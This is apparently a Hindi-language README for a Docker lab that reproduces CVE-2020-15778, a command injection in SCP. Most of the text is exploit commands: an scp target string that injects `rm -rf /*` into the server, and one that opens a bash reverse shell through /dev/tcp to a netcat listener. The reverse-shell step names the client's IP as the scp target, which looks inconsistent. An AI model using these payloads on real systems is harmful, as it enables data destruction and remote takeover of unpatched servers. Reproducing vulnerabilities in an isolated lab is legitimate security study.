
CVE-2020-15778 SCP कमांड इंजेक्शन शोषण को Docker-आधारित क्लाइंट-सर्वर सेटअप के साथ पुन: उत्पन्न करता है, जो दूरस्थ कोड निष्पादन और रिवर्स शेल पेलोड के परीक्षण के लिए है।
यह रिपॉजिटरी CVE-2020-15778 को पुनरुत्पादित करता है।
cd client
docker build -t client-cve .
cd server
docker build -t server-cve .
docker run -d -P --name scp-server server-cve
scp सर्वर का आंतरिक आईपी पता इस प्रकार प्राप्त करें:
docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' scp-server
docker run --name scp-client -i -t client-cve
क्लाइंट टर्मिनल में, चलाएं:
scp nil.txt root@<scp सर्वर का आंतरिक IP>:'`आपकी कमांड`/tmp'
पासवर्ड "PASSWORD" है।
यहां इस शोषण के कुछ उदाहरण दिए गए हैं।
scp nil.txt root@<scp सर्वर का आंतरिक IP>:'`rm -rf /*`/tmp'
क्लाइंट मशीन पर एक पोर्ट पर सुनें।
nc -lvvp 8080
scp का उपयोग करके सर्वर को इंटरैक्टिव bash को क्लाइंट मशीन पर मैप करने के लिए बाध्य करें।
scp nil.txt root@<scp क्लाइंट का आंतरिक IP>:'`bash -i >& /dev/tcp/<scp क्लाइंट का आंतरिक IP>/8080 0>& 1`/tmp'
क्लाइंट आईपी पता इस प्रकार प्राप्त किया जा सकता है:
docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' scp-client